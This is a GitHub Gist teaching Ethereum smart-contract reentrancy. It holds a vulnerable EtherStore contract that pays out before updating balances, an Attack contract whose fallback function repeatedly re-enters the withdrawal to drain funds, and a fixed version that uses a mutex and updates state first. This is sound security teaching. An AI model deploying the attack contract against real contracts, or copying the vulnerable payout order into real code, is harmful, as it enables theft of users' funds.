- Vulnerabilty: EtherStore.sol#17 send Ether to another contract before update the state, so the external contract can set an fallback value to recall the withdraw.
Last active
July 29, 2024 01:36
-
-
Save phunguyen19/dd9c14551c1c95cea9460f35dd5bd60b to your computer and use it in GitHub Desktop.
Example Ethereum Smart Contract Reentrancy attack
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| contract EtherStore { | |
| uint256 public withdrawalLimit = 1 ether; | |
| mapping(address => uint256) public lastWithdrawTime; | |
| mapping(address => uint256) public balances; | |
| function depositFunds() external payable { | |
| balances[msg.sender] += msg.value; | |
| } | |
| function withdrawFunds (uint256 _weiToWithdraw) public { | |
| require(balances[msg.sender] >= _weiToWithdraw); | |
| // limit the withdrawal | |
| require(_weiToWithdraw <= withdrawalLimit); | |
| // limit the time allowed to withdraw | |
| require(now >= lastWithdrawTime[msg.sender] + 1 weeks); | |
| require(msg.sender.call.value(_weiToWithdraw)()); | |
| balances[msg.sender] -= _weiToWithdraw; | |
| lastWithdrawTime[msg.sender] = now; | |
| } | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import "EtherStore.sol"; | |
| contract Attack { | |
| EtherStore public etherStore; | |
| // intialize the etherStore variable with the contract address | |
| constructor(address _etherStoreAddress) { | |
| etherStore = EtherStore(_etherStoreAddress); | |
| } | |
| function attackEtherStore() external payable { | |
| // attack to the nearest ether | |
| require(msg.value >= 1 ether); | |
| // send eth to the depositFunds() function | |
| etherStore.depositFunds.value(1 ether)(); | |
| // start the magic | |
| etherStore.withdrawFunds(1 ether); | |
| } | |
| function collectEther() public { | |
| msg.sender.transfer(this.balance); | |
| } | |
| // fallback function - where the magic happens | |
| function () payable { | |
| if (etherStore.balance > 1 ether) { | |
| etherStore.withdrawFunds(1 ether); | |
| } | |
| } | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| contract EtherStore { | |
| // initialize the mutex | |
| bool reEntrancyMutex = false; | |
| uint256 public withdrawalLimit = 1 ether; | |
| mapping(address => uint256) public lastWithdrawTime; | |
| mapping(address => uint256) public balances; | |
| function depositFunds() external payable { | |
| balances[msg.sender] += msg.value; | |
| } | |
| function withdrawFunds (uint256 _weiToWithdraw) public { | |
| require(!reEntrancyMutex); | |
| require(balances[msg.sender] >= _weiToWithdraw); | |
| // limit the withdrawal | |
| require(_weiToWithdraw <= withdrawalLimit); | |
| // limit the time allowed to withdraw | |
| require(now >= lastWithdrawTime[msg.sender] + 1 weeks); | |
| balances[msg.sender] -= _weiToWithdraw; | |
| lastWithdrawTime[msg.sender] = now; | |
| // set the reEntrancy mutex before the external call | |
| reEntrancyMutex = true; | |
| msg.sender.transfer(_weiToWithdraw); | |
| // release the mutex after the external call | |
| reEntrancyMutex = false; | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment